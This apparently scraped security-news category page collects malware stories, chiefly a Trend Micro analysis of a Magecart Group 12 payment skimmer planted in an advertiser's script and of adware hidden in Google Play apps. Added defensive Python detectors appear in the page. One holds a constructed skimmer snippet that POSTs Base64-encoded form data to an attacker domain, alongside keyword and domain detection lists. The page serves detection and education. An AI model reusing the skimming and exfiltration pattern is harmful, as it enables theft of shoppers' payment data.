Browsing category

Malware

Android, Android app, Android Malware, Android trojan, Computer Security, Cyber Security News, Evasion technique, Google Play Store, Malware, Security Hacker,

2 Android Apps From Google Play Store Launching Banking Malware With Sophisticated Evasion Techniques

Researchers discovered 2 malicious Android apps on the Google Play Store that drop banking malware using heavy obfuscation techniques.

Researchers discovered 2 malicious Android apps on the Google Play Store that drop the Anubis banking malware using heavy obfuscation techniques. The malicious apps posed as legitimate tools named Currency Converter and BatterySaverMobi, and the attackers also posted fake reviews, giving the apps a 4.5-star score. The Google Play store is continuously flooded with […]

The post 2 Android Apps From Google Play Store Launching Banking Malware With Sophisticated Evasion Techniques appeared first on GBHackers On Security.

Artem Radchenko, Data loss, EDGAR, Electronic Data Gathering Analysis and Retrieval, hacking, indictment, Law & order, Malware, Oleksandr Ieremenko, Phishing, SEC, Securities and Exchange Commission, securities fraud, Security threats, ukraine, wire fraud,

Two charged with hacking company filings out of SEC’s EDGAR system

They’re charged with using phishing and malware to get into the EDGAR filing system, stealing thousands of filings, and selling access.

This post appeared first on Naked Security Blog by Sophos
Author: Lisa Vaas

Backdoor, Banking Trojan, Computer Security, Cryptocurrency hack, Cyber Security News, Malware, Network Security, Ransomware, Security Hacker, spyware, trojan,

A Scary Evolution & Alliance of TrickBot, Emotet and Ryuk Ransomware Attack

Ryuk first appeared in August 2018, and while it was not incredibly active across the globe, at least three organizations were hit with Ryuk infections during the first two months of its operation, netting the attackers about $640,000 in ransom. According to CrowdStrike analysis from late last week, Grim Spider has […]

The post A Scary Evolution & Alliance of TrickBot, Emotet and Ryuk Ransomware Attack appeared first on GBHackers On Security.

Code-Injection, Magecart, Malware, Online Skimming, Social,

New Magecart Attack Delivered Through Compromised Advertising Supply Chain

by Chaoying Liu and Joseph C. Chen

On January 1, we detected a significant increase in activity from one of the web skimmer groups we’ve been tracking. During this time, we found their malicious skimming code (detected by Trend Micro as JS_OBFUS.C.) loaded on 277 e-commerce websites providing ticketing, touring, and flight booking services as well as self-hosted shopping cart websites from prominent cosmetic, healthcare, and apparel brands. Trend Micro’s machine learning and behavioral detection technologies proactively blocked the malicious code at the time of discovery (detected as Downloader.JS.TRX.XXJSE9EFF010).

The activities are unusual, as the group is known for injecting code into a few compromised e-commerce websites and then keeping a low profile during our monitoring. Further research into these activities revealed that the skimming code was not injected directly into e-commerce websites, but into a third-party JavaScript library by Adverline, a French online advertising company, which we promptly contacted. Adverline has handled the incident and immediately carried out the necessary remediation operations in cooperation with the CERT La Poste.

Figure 1: Attack chain of the online skimming attack

Figure 2: Timeline of web-skimming activities that accessed malicious domains (top); and country distribution of where they were accessed, from January 1 to January 6 (bottom)
Note: Data from Trend Micro™ Smart Protection Network™

Given the attack’s modus operandi of targeting third-party services, we initially attributed the activities to Magecart Group 5, which RiskIQ reported to be linked to several data breach incidents like the one against Ticketmaster last year. With additional help from security researcher Yonathan Klijnsma at RiskIQ, we determined that these web-skimming activities were carried out by Magecart Group 12, a seemingly new subgroup of Magecart.

Magecart Group 12’s Attack Chain
Unlike other online skimmer groups that directly compromise their target’s shopping cart platforms, Magecart Groups 5 and 12 attack third-party services used by e-commerce websites by injecting skimming code into the JavaScript libraries those services provide. Every website that embeds the script then loads the skimming code. Targeting third-party services also helps expand their reach, allowing them to steal more data.

In Adverline’s case, code was injected into a JavaScript library for retargeting advertising. It’s an approach used by e-commerce websites where visitors are tagged so they can be delivered specific ads that could attract them back to the websites. At the time of our research, the websites embedded with Adverline’s retargeting script loaded Magecart Group 12’s skimming code, which, in turn, skims payment information entered on webpages then sends it to its remote server.


Figure 3: The malicious code injected into compromised e-commerce websites by Magecart Group 12


Figure 4: The injected malicious code in Adverline’s retargeting script, designed to load skimming code (highlighted)

Skimming Toolkit
Magecart Group 12 uses a skimming toolkit that employs two obfuscated scripts. The first script is mostly for anti-reversing, while the second script is the main data-skimming code. They also include a code integrity check that detects whether the script has been modified. The check computes a hash value of the script section and stops execution of the script if the hash does not match the original.


Figure 5: Snapshot of code from the script of the toolkit responsible for integrity checking (deobfuscated)

The script also constantly cleans the browser debugger console messages to deter detection and analysis. Part of its fingerprinting routine includes checking if the script is running on a mobile device (by checking the browser User-Agent) and if there are handlers that check if the browser debugger is on. The fingerprinting routines are done to confirm that the browser session is from an actual consumer.


Figure 6: Snapshot of code from one of the scripts in the toolkit responsible for fingerprinting (deobfuscated)

Skimming Payment Data
The second script, the main skimming code, first checks whether it is executing on a shopping cart website by looking for related strings in the URL such as “checkout,” “billing,” and “purchase,” among others. Also of note are the strings “panier,” which means “basket” in French, and “kasse,” or “checkout” in German. Figure 2 shows that most of our detections (accesses to Magecart Group 12-controlled domains) were in France, with noticeable activity in Germany.

If it detects any of the targeted strings in the URL, the script starts its skimming behavior. Once a non-empty value is entered in a form field on the webpage, the script copies both the form name and the values keyed in by the user. Stolen payment and billing data is stored in JavaScript LocalStorage under the key name Cache. The copied data is Base64-encoded. The script also generates a random number to identify individual victims, which it stores in LocalStorage under the key name E-tag. The JavaScript “unload” event fires whenever the user closes or refreshes the payment webpage. The script then sends the skimmed payment data, the random number (E-tag), and the e-commerce website’s domain to a remote server through HTTP POST, Base64-encoding the entire payload.


Figure 7: The main payment data-skimming code used in the attack (deobfuscated)
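As an added defender-side example (not code from Trend Micro or from the article), the following Python script flags a script body that shows the behavioral traits described above; the checkout keywords, LocalStorage key names and domains come from the write-up, and both sample scripts are constructed for the demonstration.

```python
import re

# Indicators taken from the Magecart Group 12 write-up above.
CHECKOUT_KEYWORDS = ("checkout", "billing", "purchase", "panier", "kasse")
STORAGE_KEYS = ("Cache", "E-tag")
KNOWN_BAD_DOMAINS = ("givemejs.cc", "content-delivery.cc",
                     "cdn-content.cc", "deliveryjs.cc")  # article IoCs, defanging removed


def find_skimmer_indicators(js: str) -> dict:
    """Map each skimmer trait from the write-up to what a script body shows."""
    low = js.lower()
    return {
        # URL gating on checkout-related words, incl. French/German variants
        "checkout_words": [k for k in CHECKOUT_KEYWORDS if k in low],
        # stolen data and victim id staged in localStorage under these keys
        "storage_keys": [k for k in STORAGE_KEYS if re.search(
            r"localstorage\.setitem\(\s*['\"]" + re.escape(k.lower()) + r"['\"]", low)],
        # exfiltration fires when the page is closed or refreshed
        "unload_hook": bool(re.search(r"addeventlistener\(\s*['\"]unload['\"]", low))
                       or "onunload" in low,
        # Base64 encoding of staged data and of the POST body
        "base64": "btoa(" in low,
        # HTTP POST via XMLHttpRequest, fetch or sendBeacon
        "http_post": bool(re.search(
            r"\.open\(\s*['\"]post['\"]|method\s*:\s*['\"]post['\"]|sendbeacon\(", low)),
        "known_domains": [d for d in KNOWN_BAD_DOMAINS if d in low],
    }


def suspicion_score(indicators: dict) -> int:
    """One point per trait present; a known skimmer domain counts double."""
    score = 0
    for name, value in indicators.items():
        if value:
            score += 2 if name == "known_domains" else 1
    return score


def is_likely_skimmer(js: str, threshold: int = 4) -> bool:
    return suspicion_score(find_skimmer_indicators(js)) >= threshold


# Constructed sample: a harmless retargeting tag that only drops a pixel.
BENIGN_TAG = """(function(){ document.cookie = "rt_seen=1; path=/";
  var img = new Image(); img.src = "https://ads.example/pixel.gif"; })();"""

# Constructed sample that mimics the traits above; it is not the real script
# and does not run (formData and blob are undefined on purpose).
SUSPECT_TAG = """if (/checkout|billing|purchase|panier|kasse/.test(location.href)) {
  localStorage.setItem('Cache', btoa(formData));
  localStorage.setItem('E-tag', String(Math.random()));
  window.addEventListener('unload', function () {
    var x = new XMLHttpRequest(); x.open('POST', 'https://givemejs.cc/');
    x.send(btoa(blob)); });
}"""
```

Run `find_skimmer_indicators` over each third-party script your pages load; a high score on a tag that should only set cookies or fire a pixel is worth a manual look.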

These attacks further demonstrate the importance of securing the infrastructure used to run websites and web applications, especially those that store and manage sensitive data. Regularly patch and update software; disable, restrict, or secure outdated components and third-party plugins; and strengthen credentials and authentication mechanisms. IT and security teams should also proactively monitor their websites and applications for signs of malicious activity such as unauthorized access and modification, data exfiltration, and execution of unknown scripts.

RiskIQ’s analysis further sheds light on the correlation of Group 12’s activities to Magecart.

The following Trend Micro solutions, powered by XGen™ security, protect users and businesses by blocking the scripts and preventing access to the malicious domains:

Indicators of Compromise (IoCs):
Skimming script (SHA-256):

  • 56cca56e39431187a2bd95e53eece8f11d3cbe2ea7ee692fa891875f40f233f5
  • f1f905558c1546cd6df67504462f0171f9fca1cfe8b0348940aad78265a5ef73
  • 87ee0ae3abcd8b4880bf48781eba16135ba03392079a8d78a663274fde4060cd
  • 80e40051baae72b37fee49ecc43e8dded645b1baf5ce6166c96a3bcf0c3582ce

Related malicious domains:

  • givemejs[.]cc
  • content-delivery[.]cc
  • cdn-content[.]cc
  • deliveryjs[.]cc

With additional insights and analysis from Yonathan Klijnsma of RiskIQ


This post appeared first on Trend Micro Blog
Author: Trend Micro Cyber Safety Solutions Team

Computer Security, Cyber Attack, Cyber Security News, Malware, Ransomware, Security Hacker,

U.S. City Del Rio Attacked by Ransomware – All Operations Have Been Shut Down

The City of Del Rio’s IT system was compromised by a ransomware attack that forced it to shut down regular operations and disable its servers. Del Rio, a city in and the county seat of Val Verde County, Texas, reported that a powerful ransomware attack hit its IT system. As a precautionary step, Management Information Services (MIS) […]

The post U.S. City Del Rio Attacked by Ransomware – All Operations Have Been Shut Down appeared first on GBHackers On Security.

Backdoor, Computer Security, Cyber Security News, Hacking group, Internet, Malware, RAT, Security Hacker, Spam, Word documents,

TA505 Hacking Group Launching New Malware ServHelper via Weaponized MS Word Documents

TA505 threat actors are currently launching a new malware campaign with backdoor capability that mainly targets financial institutions via MS Word documents. The TA505 hacking group already has a record of distributing the massive Dridex campaign and widely distributing Locky ransomware, which affected millions of computers around the world. The ServHelper backdoor campaign was observed in 2018 along with 2 different […]

The post TA505 Hacking Group Launching New Malware ServHelper via Weaponized MS Word Documents appeared first on GBHackers On Security.

adware, Google Play, Malware, Mobile,

Adware Disguised as Game, TV, Remote Control Apps Infect 9 Million Google Play Users

By Ecular Xu

Adware is bothersome and disruptive, and although it has been around for a long time, it is still with us. In fact, we recently discovered an active adware family (detected by Trend Micro as AndroidOS_HidenAd) disguised as 85 game, TV, and remote control simulator apps on the Google Play store. This adware is capable of displaying full-screen ads, hiding itself, monitoring a device’s screen unlocking functionality, and running in the mobile device’s background. The 85 fake apps have been downloaded a total of 9 million times around the world. After verifying our report, Google swiftly suspended the fake apps from the Play store.

Figure 1. A screen capture of some of the adware-laden fake apps on Google Play

The “Easy Universal TV Remote,” which claims to allow users to use their smartphones to control their TV, is the most downloaded among the 85 adware-loaded apps.

Figure 2. A screen capture of the Easy Universal TV Remote app and its information

The fake app, which has already been downloaded more than 5 million times, has received multiple complaints in the comment section about its behavior.

Figure 3. A screen capture of some of the negative reviews left by Easy Universal TV Remote users complaining about the app disappearing, not functioning as advertised, and ad pop-ups

Behavior Analysis

We tested each of the fake apps related to the adware family and discovered that though they come from different makers and have different APK cert public keys, they exhibit similar behaviors and share the same code.

After the adware is downloaded and launched on a mobile device, a full-screen ad initially pops up.

Figure 4. Screenshots of the full-screen ads that pop up on an adware-infected mobile device

Upon closing the first ad, call to action buttons such as “start,” “open app,” or “next,” as well as a banner ad will appear on the mobile device’s screen. Tapping on the call to action button brings up another full-screen ad.

Figure 5. Screenshots of the call to action buttons appearing on the device’s screen

Figure 6. A screen capture of a full-screen ad that pops up after clicking the call to action button on one of the fake apps

After the user exits the full-screen ad, more buttons that provide app-related options for users appear on the screen. It also prompts the user to give the app a five-star rating on Google Play. If the user clicks on any of the buttons, a full-screen ad will pop up again.

Figure 7. Screenshots of app-related options a user can click on; all of them bring up more pop-up ads

Afterwards, the app informs the user that it is loading or buffering. However, after a few seconds, the app disappears from the user’s screen and hides its icon on the device. The fake app still runs in a device’s background after hiding itself. Though hidden, the adware is configured to show a full-screen ad every 15 or 30 minutes on the user’s device.

Figure 8. A screen capture of the fake app taken before it disappears from the device’s screen

Figure 9. A screen capture of a code snippet that enables the app to hide itself on a user’s device

Some of the fake apps exhibit another type of ad-showing behavior: they monitor the user’s screen-unlock action and show an ad each time the user unlocks the mobile device’s screen. A receiver is registered in AndroidManifest.xml so that each time the user unlocks the device, it triggers a full-screen ad pop-up.

Figure 10. A screen capture of an adware-infected device with a fake app that has already hidden itself but is still running in the device’s background

Figure 11. A screen capture of a registered receiver in AndroidManifest.xml

Figure 12. Screen capture of a code snippet that enables the adware to display full-screen ads when a user unlocks the screen of an infected device

Figure 13. A screen capture of a full-screen ad displayed after unlocking an infected device’s screen
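As an added triage example (not Trend Micro’s code or the adware’s), the following Python snippet lists the receivers in an AndroidManifest.xml whose intent filter reacts to the screen-unlock broadcast described above; the manifest it parses is a constructed sample with a hypothetical package name.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
# Broadcast delivered when the user unlocks (dismisses the keyguard of) the device.
UNLOCK_ACTION = "android.intent.action.USER_PRESENT"


def unlock_triggered_receivers(manifest_xml: str) -> list:
    """Names of <receiver> components whose <intent-filter> listens for USER_PRESENT."""
    root = ET.fromstring(manifest_xml)
    hits = []
    for receiver in root.iter("receiver"):
        name = receiver.get("{%s}name" % ANDROID_NS, "<unnamed>")
        # collect every action declared in any intent-filter under this receiver
        actions = {a.get("{%s}name" % ANDROID_NS) for a in receiver.iter("action")}
        if UNLOCK_ACTION in actions:
            hits.append(name)
    return hits


# Constructed manifest (hypothetical package): one ordinary receiver and one
# that reacts to screen unlock, as the adware described above does.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.tvremote">
  <application android:label="TV Remote">
    <receiver android:name=".UpdateReceiver">
      <intent-filter>
        <action android:name="com.example.tvremote.CHECK_UPDATE"/>
      </intent-filter>
    </receiver>
    <receiver android:name=".AdTriggerReceiver">
      <intent-filter>
        <action android:name="android.intent.action.USER_PRESENT"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""

if __name__ == "__main__":
    for name in unlock_triggered_receivers(SAMPLE_MANIFEST):
        print("receiver reacts to screen unlock:", name)
```

A remote-control or game app has little reason to react to unlock events, so such a receiver is a cheap signal to combine with the hidden-icon behavior when vetting apps.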

Trend Micro Solutions

While the fake apps can be removed manually via the phone’s app uninstall feature, it can be difficult to get there when full-screen ads show up every 15 or 30 minutes or each time a user unlocks the device’s screen.

As more and more people become dependent on mobile devices, the need to keep mobile devices safe from a growing number of mobile threats — such as fake apps laced with adware — is all the more pertinent.

Trend Micro customers are protected with multilayered mobile security solutions via Trend Micro™ Mobile Security for Android™ (available on Google Play). Trend Micro™ Mobile Security for Enterprise solutions provide device, compliance, and application management, data protection, and configuration provisioning, as well as protect devices from attacks that exploit vulnerabilities, preventing unauthorized access to apps and detecting and blocking malware and fraudulent websites. Trend Micro™ Mobile App Reputation Service (MARS) covers threats to Android and iOS devices using leading sandbox and machine learning technologies. It can protect users against malware, zero-day and known exploits, privacy leaks, and application vulnerabilities.

A comprehensive list of the indicators of compromise can be found here.


This post appeared first on Trend Micro Blog
Author: Trend Micro

Encrypt, Malware, Ransomware, Stealing,

New Malvertising Chain that Steals Confidential Information and Encrypts With GandCrab Ransomware

A new malvertising chain uses multiple payloads to steal confidential information from the victim’s machine and to encrypt their files with GandCrab ransomware. The threat actors use the Fallout exploit kit, a utility designed to exploit vulnerabilities in ports and software and to deploy backdoors on vulnerable systems. Malwarebytes security researchers observed a threat […]

The post New Malvertising Chain that Steals Confidential Information and Encrypts With GandCrab Ransomware appeared first on GBHackers On Security.

Android, Android Spy app, Android Spyware, Cyber Security News, Google, Google Play Store, Malware, Malware Games, Mobile Attacks, Security Hacker, spyware,

Spyware From Google Play as a Legitimate Android Apps That Infected 196 Country Users


Dangerous spyware apps were discovered on the Google Play store posing as legitimate apps; almost 100,000 users from 196 countries downloaded these malicious apps and were affected. Judging by current mobile-based attacks, the Android platform is one of the biggest targets for cybercriminals looking to spy on users and steal personal information around the globe. There […]

The post Spyware From Google Play as a Legitimate Android Apps That Infected 196 Country Users appeared first on GBHackers On Security.